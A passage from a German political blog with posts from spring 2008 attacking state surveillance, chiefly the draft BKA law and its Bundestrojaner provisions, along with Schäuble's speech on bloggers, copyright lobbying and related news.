Antivirenhersteller wissen natürlich, dass sie unseriöse Geschäftemacher sind, und kennen auch 42.zip. Warum erzähle ich das alles? Yahoo hat mit McAfee einen Deal gemacht, und wenn man bei deren Suchmaschine nach fefe sucht, kriegt man bei fefe.de ominöse Warnungen, ich würde Trojaner oder Adware verteilen.
Kennt jemand einen Anwalt, der Lust hat, an Yahoo ein Exempel zu statuieren?
[Screenshot 1, Screenshot 2] (Danke, Korbinian)

Thu May 15 2008

[l] Whoa krass: NDS hat gewonnen. NDS ist die Murdoch-Tochter, die professionelle Hardware-Hacker bezahlt hat, den DRM-Scheiß der Konkurrenz zu knacken, und die Details dann an die Pay-TV-Piratenszene geleakt hat. Die Klage haben sie jetzt zwar nicht juristisch gesehen gewonnen, aber sie müssen nicht mal 2000 Dollar Schaden wiedergutmachen. Das ist natürlich gar nichts, wenn man bedenkt, dass sie die Konkurrenz damit quasi platt gemacht haben. Money Quote:
Lawyers for NewsCorp told the jurors its employees were not the ones responsible for posting the information on the Internet, although they conceded NDS had cracked the EchoStar security codes.
NewsCorp lawyers said such "reverse engineering" is standard in the cut-throat satellite television business.
[l] Das britische Schulsystem ist ja eh der Running Gag überhaupt, schon immer gewesen, schon bevor sie ihre gesamte Kohle in Repressionstechnologie investiert haben. Und jetzt das: Briten outsourcen ihre SATs und natürlich bricht ihnen alles im totalen Chaos zusammen. Das ist quasi eine zentrale Datenbank, wo die Lehrer die Testergebnisse der Schüler eintragen sollten. Und wie immer wenn Regierungen Datenbanken basteln lassen, bricht das komplett unter dem Eigengewicht zusammen.
Ich muss ja sagen: ich bin schockiert — SCHOCKIERT!! --, dass das sonst so erfolgreiche Privatisierungs-Erfolgsmodell dieses Mal so versagt hat. Damit konnte niemand rechnen!1!! Ich bin mir sicher, wenn Deutschland das nachmacht (wie wir bisher noch alle dämlichen Privatisierungsideen nachgemacht haben), dann wird das VIEL besser laufen!1!!
Update: Hatte die falsche Url gepasted, diese ist die richtige.

Mon May 12 2008

[l] Die neuen Terroristen: Touristen, die auf einer Fähre das Autodeck fotographieren. Das trifft mich besonders hart, weil ich auf genau so einer Fähre auch schon mal gefahren bin, ich stand an genau der selben Stelle, und habe auch Fotos gemacht. Ich habe sogar die Kamera laufen gehabt, als ich mit dem Auto in den Bauch der Fähre gefahren bin. Da kann ich ja nur von Glück reden, dass die mich nicht auch direkt auf die Terroristenliste gesetzt haben. (Danke, Max)
[l] Hups, waren an der verkackten Geiselbefreiung 1972 anläßlich der Olympischen Spiele in München die Israelis schuld? Israel hatte ja Deutschland und Deutsche Polizisten verantwortlich gemacht und sogar Schadensersatz gefordert, und jetzt erzählt der damalige Polizeipsychologe in einem Nebensatz, dass die operative Leitung der ganzen Befreiungsaktion in Israel lag.

Thu May 1 2008

[l] DNA-Tests von großen Teilen der Bevölkerung sind ja in Mode, und erschreckenderweise machen da auch immer weite Teile der Bevölkerung mit. Aktuell: die Uni Siegen (10.000 Studenten!) macht einen Massen-DNA-Test. Lustig, wie sich der Ton innerhalb der einen Mail ändert. Erst heißt es
die Kriminalpolizei wird in den nächsten Wochen an der Uni Siegen eine freiwillige DNA-Reihenuntersuchung durchführen
und weiter unten dann
Uns wurde auch recht glaubhaft gemacht, dass gute Gründe für eine Nicht-Teilnahme durchaus akzeptiert würden.

Tue Apr 29 2008

[l] Microsoft gibt Polizei "Hacker-Tool" für Computer-Forensik. Leider fehlen da die ganzen schönen Details, die die Geschichte interessant gemacht hätten. Interessant wäre z.B. gewesen: kann einen gelockten Desktop unlocken. Oder: kann BitLocker ohne PIN entschlüsseln. Aber all das scheint nicht der Fall zu sein. Insofern: Sturm im Wasserglas. Nichts, was man nicht auch mit einer Linux Boot CD machen kann.
[l] SSchäubles Rede von neulich im Transkript beim BMI. Bemerkenswert, in was für einer Realitätsverzerrung der Mann inzwischen lebt. So erzählt er da weiträumig, dass die Presse jetzt erstmals einen besonderen Schutz vor "heimlichen Ermittlungsmaßnahmen der Polizei" genössen. Offenbar aber nicht vom BND, wie man gerade gut sehen kann. Na ganz toll.
Wißt ihr, ich bin ja nun deutlich jünger als der Schäuble. Aber selbst ich erinnere mich noch an eine Zeit, da hat die Polizei keine Briefe geöffnet, keine Wanzen oder Videokameras installiert, keine Peilsender an Autos angebracht, keine Vorratsdatenspeicherung betrieben, und der Innenminister (und die Innenminister waren bei uns schon immer wirklich widerliche Menschen) wollte keine Flugzeuge abknallen. Früher brauchte man schlicht keinen Schutz vor heimlichen Ermittlungsmaßnahmen der Polizei, ob man jetzt Journalist war oder nicht. Briefe Öffnen, Abhören, das waren für uns Dinge, die die fiese DDR-Junta machen würde, und weshalb man an Briefe an die in der SBZ ("sowjetische Besatzungszone", für die jüngeren Semester unter uns) lieber keine Details schrieb, die die hätten in Gefahr bringen können. Leute abknallen, sowas haben DDR-Grenzer gemacht, nicht unsere Innenminister. Peilsender hat man vom KGB erwartet, nicht von unserer Polizei. Und die Vorratsdatenspeicherung läuft ja sowieso völlig außer Konkurrenz, so weit hat ja nicht mal die Phantasie von dem Orwell gereicht.
Und dieser Serientäter, dieser grauenvollste aller Innenminister, dieser durchgeknallte Paranoiker sagt uns (also den Journalisten unter uns) jetzt ins Gesicht, hey, immerhin genießt ihr jetzt "einen besonderen Schutz". Wohlgemerkt sagt er nicht, "ihr seid geschützt", denn das entspricht ja auch nicht der Wahrheit. Tatsächlich können Journalisten jetzt sogar nicht mehr von ihrem Zeugnisverweigerungsrecht Gebrauch machen, wenn der GröIaZ nur eine hinreichend grandiose Bedrohung herbei halluziniert.
Aber der Mann sieht sich so sehr im ewigen Recht und sein Handeln jenseits von Fehl, dass er danach folgendes sagt:
Die Schutzpflicht des Staates gegenüber den Bürgerinnen und Bürgern kann es in manchen Fällen erforderlich machen, dass staatliche Stellen brisante Informationen geheim halten. Falls der Presse geheime Informationen zugespielt werden, hat sie eine besondere Verantwortung, wenn sie sich für deren Veröffentlichung entscheidet. Wenn die Presse diese Verantwortung auf die leichte Schulter nehmen sollte, kann und muss der Staat seine Geheimhaltungsinteressen geltend machen. Bei der juristischen Bewertung solcher Veröffentlichungen bedarf es im Einzelfall einer genauen Abwägung, ob der Pressefreiheit oder den staatlichen Geheimhaltungsinteressen der Vorrang gebührt.
So sieht das nämlich aus. Das ist der nächste Schritt der Presse-Gleichschaltung. Sachen, die dem Staat peinlich wären, werden dann einfach "brisant" oder "geheim" genannt und schon werden die Journalisten daran gehindert, das zu veröffentlichen. Schäuble spricht in dem Zusammenhang von "Beihilfe". Und dann das hier:
Aber auch dieser Schutz von Journalisten ist nicht absolut. Das Bundesverfassungsgericht hat entschieden, dass die Gespräche von Journalisten — anders als die Gespräche von Geistlichen oder Abgeordneten — nicht von vornherein und absolut geschützt sind.
Ach, ist dem so? Hab ich offenbar verpaßt. Das Verfassungsgericht findet es OK, wenn der Schäuble Journalisten beschnüffelt? Ob die am Verfassungsgericht wissen, was der Mann ihnen da in den Mund legt?
Im Übrigen, und das nehme ich mal als Kompliment, klotzt er so grob gegen Blogs, wie er nur kann. Ich zitiere da mal den Teil, wo man sieht, was er für repräsentatives Blog-Verhalten hält:
Wilde Gerüchte, schrille Selbstdarsteller und radikal zugespitzte Thesen haben dabei gute Chancen, sich gegen seriöse Konkurrenz durchzusetzen.
Ein Beispiel dafür: Als der Hurrikan Katrina in New Orleans wütete, hat ein Blogger auf einer reichweitenstarken Online-Plattform das Gerücht in Umlauf gebracht, dass verzweifelte Einwohner menschliche Leichen essen würden, um nicht zu verhungern.
Aaaaaha. So ist das also. Wir Blogger sind alles fiese Lügner und Selbstdarsteller. Im krassen Gegensatz zu traditionellen Printmedien (wie der "BILD"?), über die er folgendes zu sagen hat:
In Zeitungen arbeiten Nachrichtenexperten, die unabhängig und recht zuverlässig — der einen oder anderen Zeitungsente zum Trotz — einschätzen können, was Fakt ist und was Fiktion.
Aha.
Sie vertreten keine Lobbyinteressen.
Das konnte man beim Postmindestlohn prima sehen, ja.
Sie treffen eine am aktuellen Diskussionsstand orientierte Auswahl interessanter Nachrichten
Ja, genau, kleines blondes Mädchen vermißt.
Sie machen transparent, wo der Sachstand aufhört und der Kommentar anfängt.
Schön wäre das.
Der Filter, den eine Nachricht passieren muss, bevor sie ihren Weg zum Zeitungsleser findet, ist die von Sachkenntnis geleitete journalistische Unbestechlichkeit. Damit erreichen Zeitungen einen hohen Qualitätsstandard, von dem die meisten Internetpublikationen — von Ausnahmen abgesehen — nur träumen können.
Also ich habe hier ja auch einen Filter. Den Bullshit-Filter. Und der ist hier gerade explodiert.
Aber wartet, wird noch schöner. Woran denkt er da gerade, wenn er von Filtern redet? Vom "Sachsen-Sumpf"! Na kein Wunder, das war ja mal wieder die CDU, die da im Sumpf steckte. Das hätten die Journalisten mal weg filtern sollen!1!!
Immerhin, einen tollen Tipp für die Journalisten hat er noch:
Qualitätsjournalismus besteht auch darin, mittels einer ausgewogenen Berichterstattung transparent zu machen, was Regel ist und was Ausnahme. Alles andere führt recht schnell zu Populismus.
Und wenn sich jemand damit auskennt, aus Einzelfällen populistisch eine mongolische Horde zu machen, dann ja wohl unser Wolfgang! Gibt es eigentlich irgendwas in seiner Laufbahn, das er nicht in Verletzung dieser Regel begründet hat?
Update: "schon immer" ist vielleicht zu viel gesagt, aber solange ich denken kann ist das so. Und das geht zurück bis Zimmermann. (Danke, Stefan)

Sun Apr 27 2008

[l] Wer ist eigentlich gestorben und hat diesem Bernd Neumann das Amt des Staatsministers für Kultur und Medien hinterlassen?! Das ist ja FURCHTBAR, was der so von sich gibt! Aktuell: "Kultur ist kein allgemein verfügbares und kostenloses Gut". Hallo? Aufklärung? Renaissance? Es gab mal Zeiten, da mußte man bei Museen keinen Eintritt zahlen. Da sind Eltern einfach so ins Museum gegangen mit ihren Kindern. Und heute kann man sich das als Hartz IV Opfer gar nicht mehr leisten. Ja, wir sind in der Tat auf dem besten Weg ins Mittelalter zurück. Am besten verbieten wir auch gleich die Bücher. Buchdruck muss der Kirche vorbehalten bleiben. Wo kämen wir da hin, wenn jeder Zugang zu Kultur und Bildung hat. Die Leute sind eh schon viel zu gut gebildet und fallen nicht mehr so leicht auf die Lügen der Politiker rein.
Ich bin ja ein großer Fan von Stephen Fry. Der hat kürzlich für die BBC eine Dokumentation über Gutenberg gemacht. Es ist ja bekannt, was die als erstes gedruckt haben: eine Bibel. Wißt ihr, was die als zweites gedruckt haben? Ratet mal. Na? Kommt jemand drauf? Ablassbriefe. Und genau dahin geht es zurück, dank frühmittelalterlicher Betonköpfe wie diesem Neumann. Oooooder der ist gar kein Betonkopf und nur von der Contentmafia gekauft. Aber das wäre ja üble Nachrede, wenn ich das einfach so behaupten würde.
Immerhin, das enteignen des Volkes ist Priorität Nummer eins, und so ist jetzt nach Hartz IV der Kampf gegen die Kultur, äh, die Raubkopierer Chefsache. Die verkackte Energiepolitike von Frau Merkel hat u.a. dazu geführt, dass Nachfrage für Biosprit die Lebensmittel verknappen läßt, die Lebensmittelpreise explodieren, Menschen hungern, Hartz IV wird natürlich nicht angepaßt. Sollen sie doch Kuchen essen! Ich bin ja vor allem schockiert, wer bei diesem "offenen Brief" alles unterschrieben hat. Götz Alsmann? Der sich vom Fernsehen aus Steuergeldern ernähren läßt, weil die Contentmafia ihn so wenig an seinen CDs mitverdienen läßt? Bernd Eichinger? Der lebt auch von Steuermitteln, denn so funktioniert Filmproduktion heute. Googelt mal stupid money. Der Eichinger soll mal GANZ RUHIG sein, ich habe dem seine Filme finanziert mit meinen Steuergeldern. Wirklich enttäuscht bin ich, dass Reinhard Mey unterschrieben hat. Den habe ich für schlauer gehalten. Tokio Hotel, damit rechnet man ja noch. Aber Grönemeyer? Die sind doch alle schon von ihren Labels verarscht worden, wie können die sich von denen jetzt vor den "Raubkopierer"-Karren spannen lassen?! Ob sich irgendjemand von denen mal den Text durchgelesen hat? Die zitieren da ausgerechnet Herrn Getty. Geht's noch?
Mal ganz abgesehen davon: bisher hat die Merkel noch alles mit Pauken und Trompeten verkackt, was sie zur Chefsache gemacht hat. Wenn ich Musiker wäre, das LETZTE, was ich wollte, wäre dass die Merkel die Quelle meines Lebensunterhaltes zur Chefsache macht.

Thu Apr 24 2008

[l] Unter älteren Semestern findet man häufig die Einstellung, dass der Staat schon keine anrüchigen Dinge gegen seine Bürger machen würde. Z.B. habe ich schon Leute sagen hören, das mit dem Kernbereich der privaten Lebensgestaltung sei ja überflüssig, denn er Staat habe ja gar kein Interesse daran, Leute beim Liebesspiel oder beim Kacken zu belauschen oder zu filmen. Schön wäre das, kann ich nur sagen. Schaut mal die Geschichte mit dem BND, dem Bundestrojaner und dem afghanischen Politiker an. Nun kann man sagen, gut, das ist schließlich genau die Aufgabe des BND, Informationen über ausländische Würdenträger heran zu schaffen. Aber guckt mal:
Die ausgetauschten Informationen hatten dem Bericht zufolge vor allem privaten bis "intimen" Charakter. Die Online-Razzia habe der BND rechtlich "ohne Weiteres" für durchführbar gehalten.
Zugegeben, ich weiß nicht, was "intim" in dem Zusammenhang meint. Flirten? Telefonsex? Streit mit einer seiner Frauen? Aber egal, privat bis intim ist die Ansage. Da könnte man ja denken, OK, das braucht der BND nicht, da klinken die sich dann aus. Aber offensichtlich haben die ja nicht mal überlegt, ob das ethisch vertretbar ist! Einziges Kriterium: können wir dafür juristischen Ärger kriegen?
Und das ist meines Erachtens auch unser wichtigstes Argument beim BKA-Gesetz und den anderen furchtbaren Gesetzen, die gerade so gemacht werden. Da kommt auch immer wieder das Argument, ach naja, der Staat habe ja gar kein Interesse daran, euch beim Sex zu filmen. Und außerdem sei das ja so aufwendig mit der Überwachung, und habe so viel Vorlauf, das würde nicht frivol eingesetzt. Und wenn man dann genauer hinguckt, findet man eine Gefahr-im-Verzug Regelung für den ach so aufwendigen Überwachungskram, und findet als Kriterium "wir durften, also taten wir".
Nicht auszudenken, wenn jemand dieser Junta tatsächlich Befugnisse wie "Flugzeug abschießen" oder "Todesstrafe" gäbe. Ich bin mir sicher, da würde dann auch nicht zählen, ob das moralisch vertretbar und/oder sinnvoll ist, wenn sie dürfen, dann tun sie auch.

Wed Apr 23 2008

[l] Die neuen Terroristen: ÖPNV-Kunden, die Werbung angucken.
Aufgrund der Berichterstattung des TV-Senders Fox News wird nun von den zuständigen Behörden erwirkt, dass die Werbung für das Spiel "GTA IV" auf den Bussen in Chicago wieder entfernt werden muss. Der Sender hatte die gewalttätigen Schusswechsel in Chicago des letzten Wochenendes, in dessen Verlauf 32 Personen verletzt und sechs getötet wurden, mit der Werbung für das Spiel in Verbindung gebracht.
Gut, passt nicht wirklich in die "Neue Terroristen"-Serie, weil sie ja gegen die Werbung was gemacht haben, und nicht alle Buskunden verhaftet haben. Aber der Tag ist ja noch jung. (Danke, Anton)

Tue Apr 22 2008

[l] Der PWN2OWN-Bug, mit dem sie das Macbook aufgemacht haben, der war über ein Jahr lang bekannt, aber Apple hat den Arsch nicht hochgekriegt. Da sieht man mal wieder, was für eine überlegene Security-Strategie Apple fährt. (Danke, Julian)

Mon Apr 21 2008

[l] Merkel gibt nicht dem Biosprit die Schuld an der Lebensmittelknappheit, sondern den Indern.
In Indien etwa nähmen inzwischen rund 300 Millionen Menschen eine zweite Mahlzeit am Tag ein, sagte Merkel. "Wenn die plötzlich doppelt soviel Nahrungsmittel verbrauchen als sie das früher gemacht haben und dann auch noch 100 Millionen Chinesen beginnen Milch zu trinken, dann verzerren sich natürlich unsere gesamten Milchquoten und vieles andere", sagte die CDU-Chefin mit Blick auf den europäischen Agrarmarkt.
Ja aber echt mal, was bilden sich die Inder denn bitte ein?! Die können doch nicht einfach anfangen, zwei Mahlzeiten pro Tag zu essen!1!! Wie können die so unsolidarisch mit uns Europäern sein, da wird doch dann bei uns der Reis teurer!!! (Danke, Michael)
[l] Ihr habt euch ja sicher alle das BKA-Gesetz durchgelesen, oder? Wenn nicht: tut es. Jetzt. Guckt mal, wie toll das formuliert ist. Beispiel:
Ist die Identität festgestellt, sind die im Zusammenhang mit der Feststellung angefallenen Unterlagen zu vernichten, es sei denn ihre weitere Aufbewahrung ist nach anderen Rechtsvorschriften zulässig.
WTF? "zulässig", nicht "notwendig"? Und überhaupt: alles wird vernichtet!! April April!
Sind die Unterlagen an andere Stellen übermittelt worden, sind diese über die erfolgte Vernichtung zu unterrichten.
Vermutlich, damit DIE dann die Unterlagen aufheben und nichts verloren geht. Ich sehe da ein lustiges Aktenkarussell vor meinem geistigen Auge.
Ich frage mich ja auch, wie ich mir das Vorladungsrecht vorzustellen habe. "Kommen Sie mal morgen nach Wiesbaden, bitte!" oder wie?
Außerdem dürfen da Kontakt- oder Begleitpersonen längerfristig observiert, video- und audioüberwacht, mit Peilsendern versehen, mit V-Männern oder verdeckten Ermittlern bearbeitet werden, wenn:
die Abwehr der Gefahr oder die Verhütung der Straftaten auf andere Weise aussichtslos ist oder wesentlich erschwert wäre.
Da wird nicht gefordert, dass die Ermittlung weniger aussichtslos ist durch die Maßnahmen! Die selbe Klausel "schützt" auch Bürger vor Beschnüffeln in Ton und Bild. Im Übrigen scheißen wir auf unschuldige Passanten:
Die Maßnahme kann auch durchgeführt werden, wenn Dritte unvermeidbar betroffen werden.
Das ist dann wohl die annalist-Klausel. Frauen, Kinder, Nachbarn? Egal, da scheißen wir drauf. Alle plattmachen!1!!
Oh und hier sind die Kriterien für eine Gefahr, die einen BKA-Einsatz rechtfertigt:
Abwehr einer Gefahr für den Bestand oder die Sicherheit des Staates oder für Leib, Leben oder Freiheit einer Person oder Sachen von bedeutendem Wert, deren Erhaltung im öffentlichen Interesse geboten ist.
Wenn also jemand an ~~ein Denkmal~~ Schäubles Dienstwagen pinkelt — klarer Fall von BKA-Einsatz. Und wenn das ansonsten nicht aufklärbar erscheint, hören wir einfach alle ab, die zu dem Zeitpunkt in der betroffenen Stadt wohnen.
Für die verdeckten Ermittler braucht es immerhin einen richterlichen Beschluß, wenn die Privatwohnungen betreten — aber es gibt natürlich auch eine "Gefahr im Verzug" Regelung, bei der dann nachträglich abgebrochen werden muss, wenn der Richter das nicht unterschreiben will, und keine Regelung, dass so illegal gewonnene Erkenntnisse nicht verwertet werden dürfen. Oh und guckt euch mal das hier an:
Ein Verdeckter Ermittler darf unter der Legende mit Einverständnis des Berechtigten dessen Wohnung betreten. Das Einverständnis darf nicht durch ein über die Nutzung der Legende hinausgehendes Vortäuschen eines Zutrittsrechts herbeigeführt werden.
Tolle Wurst. Sie dürfen auch Wohnungen anderer Leute als des Verdächtigen abhören, wenn sich der Verdächtige dort aufhält und das Beschnüffeln in den eigenen vier Wänden "alleine nicht zur Abwehr der Gefahr nach Absatz 1 führen wird". Also, auf Deutsch: solange das Schnüffeln und Spannen nur sinnlos genug ist, können sie es ausweiten. Prima, nicht wahr? Ich fühle mich gleich viel sicherer! Und wieder gibt es einen Richtervorbehalt, der (selbst unter der nicht zutreffenden Annahme, dass ein Richtervorbehalt tatsächlich einen Schutz darstellt) durch eine Gefahr-im-Verzug Regelung ohne Verwendungsverbot für illegal erhobene Daten ausgehebelt wird.
Bei dem Lauschangriff haben sie folgenden "Schutz" drin:
Die Maßnahme nach Absatz 1 darf nur angeordnet und durchgeführt werden, soweit auf Grund tatsächlicher Anhaltspunkte, insbesondere zu der Art der zu überwachenden Räumlichkeiten und dem Verhältnis der zu überwachenden Personen zueinander, anzunehmen ist, dass durch die Überwachung Äußerungen, die dem Kernbereich privater Lebensgestaltung zuzurechnen sind, nicht erfasst werden.
Wenn dann doch was privates passiert, sollen sie abschalten. Wenn sie sich nicht sicher sind, sollen sie weiter aufnehmen (aber offenbar nicht reinhören) und das wird dann einem Richter übergeben, der es dann löschen läßt, wenn es zu privat ist. Und das soll mich jetzt beruhigen? Dass statt einem BKA-Beamten ein Richter in meinem Leben herum schnüffelt? Da fühle ich mich doch gleich viel sicherer!1!!
Dann geht es weiter mit der Ausschreibung zur polizeilichen Beobachtung. Hier kommen wir offenbar ins Gebiet der Phrenologie, denn da gibt es folgende tolle Formulierung:
Die Ausschreibung zur polizeilichen Beobachtung ist nur zulässig, wenn […] die Gesamtwürdigung der Person und ihre bisher begangenen Straftaten erwarten lassen, dass sie künftig Straftaten gemäß §4a Abs 1 Satz 2 begehen wird […] und dies zur Verhütung der Straftaten erforderlich ist.
Wie kann eine Ausschreibung zur polizeilichen Beobachtung jemals für die Verhütung einer Straftat erforderlich sein? Immerhin haben sie ja schon Peilsender in ihrem Sortiment. Daher nehme ich mal an, dass das nur so als Floskel da steht, aus optischen Gründen, und das nie wirklich fraglich sein wird.
Oh und das BKA darf Rasterfahndung machen. Dann dürfen sie
[…] von öffentlichen oder nicht-öffentlichen Stellen die Übermittlung von personenbezogenen Daten von bestimmten Personengruppen […] verlangen […].
Lacher am Rande:
Von den Verfassungsschutzämtern des Bundes und der Länder, dem Militärischen Abschirmdienst sowie dem Bundesnachrichtendienst kann die Übermittlung nach Satz 1 nicht verlangt werden.
Da sieht man die amtsinternen Schlachtfelder förmlich vor sich. Und was tun sie jetzt mit den Daten? Nun, sie löschen sie. Außer… ja außer:
zu löschen, soweit sie nicht für ein mit dem Sachverhalt zusammenhängendes Verfahren erforderlich sind.
Jetzt frage ich mich als Laie natürlich, was "zusammenhängendes Verfahren" ist. Wenn sie da z.B. wegen "ZOMG TERRORISTEN, WAFFENSCHMUGGEL" rasterfahnden, und die Daten dann an die IFPI übergeben, ist das dann auch ein "zusammenhängendes Verfahren"? Geht ja in beiden Fällen um Schmuggel, und es weiß doch jeder, dass Raubkopierer Terroristen sind.
Aber kommen wir zum Bundestrojaner, dem eigentlichen Grund, wieso wir hier sind. Immerhin steht da diesmal nichts von Sachschäden, sondern nur Leib, Leben oder Freiheit, Güter der Allgemeinheit, deren Bedrohung die Grundlagen oder den Bestand des Staates oder die Grundlagen der Existenz der Menschen berührt. "Berührt"? Nicht "bedroht" oder "in Frage stellt"? Desweiteren:
Eine Maßnahme nach Satz 1 ist auch zulässig, wenn sich noch nicht mit hinreichender Wahrscheinlichkeit feststellen lässt, dass ohne Durchführung der Maßnahme in näherer Zukunft ein Schaden eintritt, […]
ACH. Also planen sie doch die weitgehend unbegründete Massenmaßnahme? Anders kann ich das nicht lesen hier.
[…] sofern bestimmte Tatsachen auf eine im Einzelfall durch bestimmte Personen drohende Gefahr für eines der in Satz 1 genannten Rechtsgüter hinweisen.
Dieser "bestimmte Personen" Teil stört mich. Wie, bestimmte Personen? Nicht die Zielperson? Das klingt für mich nach "wir schnorcheln mal alles mit", so vage wie das hier formuliert ist. Immerhin:
Die Maßnahme darf nur durchgeführt werden, wenn sie für die Aufgabenerfüllung nach § 4a erforderlich ist und diese ansonsten aussichtslos oder wesentlich erschwert wäre.
Hier kommt also mal wieder die "muss nur sinnlos genug sein" Regel ins Spiel.
Die Maßnahme darf sich nur gegen eine Person richten, die entsprechend §17 oder §18 des Bundespolizeigesetzes verantwortlich ist. Die Maßnahme darf auch durchgeführt werden, wenn andere Personen unvermeidbar betroffen werden.
Das ist ja lächerlich. Erst sagen sie, man darf das machen, wenn man nicht sicher ist, dass überhaupt in näherer Zukunft ein Schaden zu erwarten ist, und dann das hier? Woher soll man denn dann wissen, wer der Verantwortliche sein wird, wenn man noch nicht mal weiss, dass es in absehbarer Zeit stattfinden wird?
Noch eine Frage: Gefahr für Leib und Leben kann man ja auch sagen, wenn jemand selbstmordgefährdet ist. Kann das BKA jetzt alle Emo-Teenies verwanzen?
Kommen wir zu dem Teil, wo sie versuchen, ihren Hintern zu bedecken.
Liegen tatsächliche Anhaltspunkte für die Annahme vor, dass durch die Massnahme allein Erkenntnisse aus dem Kernbereich privater Lebensgestaltung erlangt würden, ist die Maßnahme unzulässig.
Solange also jemand auch nur einen Spam auf dem Rechner kriegt, ist der Rechner Freiwild.
Soweit möglich, ist technisch sicherzustellen, dass Daten, die den Kernbereich privater Lebensgestaltung betreffen, nicht erhoben werden.
Hier ist ja unstrittig (unter Leuten, die schon mal einen Computer gesehen haben), dass das unmöglich ist. Eine reine PR-Luftnummer also, diese Formulierung überhaupt aufzunehmen.
Erhobene Daten sind unverzüglich von zwei Bediensteten des Bundeskriminalamtes, von denen einer die Befähigung zum Richteramt hat, auf kernbereichsrelevante Inhalte durchzusehen.
HAHAHAHAHAHA, bitte was?! Das ist ja zum Totlachen! Befähigung zum Richteramt? Was haben DIE denn geraucht?
Bestehen Zweifel, ob Daten dem Kernbereich privater Lebensgestaltung zuzurechnen sind, sind diese zu löschen oder unverzüglich dem anordnenden Gericht zur Entscheidung über die Verwertbarkeit und Löschung der Daten vorzulegen.
Der größte Hammer in dem Gesetzesentwurf ist aber, dass sie ernsthaft zwischen Bundestrojaner und "Quellen-TKÜ" unterscheiden. Quellen-TKÜ ist selbstverständlich exakt das gleiche. Hier wird ein Trojaner eingebracht. Aber mit diesem argumentativen Taschenspielertrick versuchen sie, den Bundestrojaner durch die Hintertür durchzuschmuggeln. Beim Trojanereinsatz zum Skype-Abschnorcheln gibt es dann nämlich doch wieder Sachschaden als Anlaß. Oh und erinnert ihr euch an deren dreistes Rumgelüge, dass das Erstellen eines Bundestrojaners ja so aufwendig sei, der für jedes Ziel extra zurecht angepaßt werden müsse, und daher das eh keine Maßnahme sei, die man mal eben machen könnte, das braucht enormen Vorlauf, blahblah? Zuletzt wurde diese dreiste Lüge von Herr Bosbach bei "Klipp und Klar" im RBB geäußert. Der ist ja eh schon häufiger durch kreative Realitätsauslegung aufgefallen. Und jetzt haben sie eine "Gefahr im Verzug" Regelung dafür. Falls die Zeit zu knapp ist, um einen Richter zu befragen. Laßt mich das noch mal in groß schreiben:
Für den Bundestrojaner gibt es eine "Gefahr im Verzug" Regelung.
Damit überführen sie sich selbst der Lüge. Ist das nicht toll? So einfach kann das gehen. Erst lügen sie uns ins Gesicht, dann glauben sie, wenn das Gesetz nicht öffentlich gemacht wird, bevor es zu spät ist, dann könnten sie da Tatsachen schaffen.
Weiter geht es im Gesetz mit dem Erheben von Verkehrsdaten, wo sie dem BKA Zugriff auf die Daten der Vorratsdatenspeicherung einräumen, und wieder mit der "auf andere Weise aussichtslos oder wesentlich erschwert" Inkompetenzklausel.
Danach kommen noch so unwichtige Details wie dass das BKA "zur Abwehr einer Gefahr eine Person vorübergehend von einem Ort verweisen oder ihr vorübergehend das Betreten eines Ortes verbieten" kann. Auf dieser nicht vorhandenen Einschränkung basierend kann das BKA dann auch alle Leute festnehmen, um "einen Platzverweis […] durchzusetzen" oder einfach nur so, präventiv, weil sie verdächtig sind. Und wenn das BKA jemanden festhalten kann (was ja nicht weiter eingeschränkt ist so als Personengruppe), dürfen sie sie auch durchsuchen. Wobei sie ja eh jeden durchsuchen dürfen, der eine Sache bei sich führt, mit der er sich verletzen oder Leben oder Gesundheit anderer schädigen kann (also alles, eigentlich. Wenn man es wirklich will, kann man sich mit einer Hose oder einem Taschentuch umbringen). Oder wenn man mit der Sache Sachen beschädigen oder sich oder anderen die Flucht ermöglichen oder erleichtern kann (was sie damit wohl meinen? "Schuhe"?). Oh und natürlich kann das BKA Personen durchsuchen, um zu gucken, ob sie Waffen bei sich führen. Hierfür muss noch nicht einmal eine Bedrohung für andere ausgehen, es reicht schon, wenn der BKA-Beamte sich selbst durch potentielle Waffen bedroht fühlt. Aber wartet, kommt noch besser.
Das Bundeskriminalamt kann eine Wohnung ohne Einwilligung des Inhabers betreten und durchsuchen, wenn […] Tatsachen die Annahme rechtfertigen, dass sich in ihr eine Sache befindet, die nach §20s Abs 1 Nr 1 sichergestellt werden darf.
Und das waren die Sachen, mit denen man sich oder andere töten oder verletzten, Sachen beschädigen oder sich oder anderen die Flucht ermöglichen oder erleichtern kann. Wir halten also fest: das BKA darf alle Wohnungen durchsuchen, denn Tatsachen sprechen dafür, dass sich darin Messer befinden, mit denen man sich verletzten kann. Und Werkzeug, mit dem man Sachen beschädigen kann. Immerhin dürfen sie nachts nur kommen, wenn dies zur Abwehr einer gegenwärtigen Gefahr […] erforderlich ist. Da fühlt man sich doch gleich viel sicherer! Oh, oder wenn es eine dringende Gefahr ist (§20t Abs 3) und erfahrungsgemäß dort was zu holen ist.
Auch der Schutz von Journalisten und Anwälten ist ganz toll gelungen:
Soweit durch eine Maßnahme eine [solche Person] betroffen wäre und dadurch voraussichtlich Erkenntnisse erlangt würden, über die diese Person das Zeugnis verweigern dürfte, ist dies im Rahmen der Prüfung der Verhältnismäßigkeit unter Würdigung des öffentlichen Interesses an den von dieser Person wahrgenommenen Aufgaben und des Interesses an der Geheimhaltung der dieser Person anvertrauten oder bekannt gewordenen Tatsachen besonders zu berücksichtigen.
Äh, wie meinen? Verhältnismäßigkeit? Abwägung? Das ist ja krass. Also wenn das BKA meine Wohnung abhört, und mein Anwalt besucht mich, dann müssen die nicht sofort aufhören, sondern das liegt dann im Ermessen von jemandem beim BKA?!? Das kann sich ja wohl nur um einen Scherz handeln!? Oh, wird noch härter:
Die Absätze 1 bis 3 gelten nicht, sofern Tatsachen die Annahme rechtfertigen, dass die zeugnisverweigerungsberechtigte Person für die Gefahr verantwortlich ist.
BWHAAHAHAHA, was für eine Farce! "Der spricht häufig mit seinem Anwalt, also ist der Anwalt mit verantwortlich, den hören wir jetzt mal ab" oder wie? Mann Mann Mann.
Erwähnte ich, dass das Zeugnisverweigerungsrecht abgeschafft wird?
Unter den in […] bezeichneten Voraussetzungen ist der Betroffene zur Verweigerung der Auskunft berechtigt. Dies gilt nicht, soweit die Auskunft zur Abwehr einer Gefahr für den Bestand oder die Sicherheit des Staates oder Leib, Leben oder Freiheit einer Person erforderlich ist.
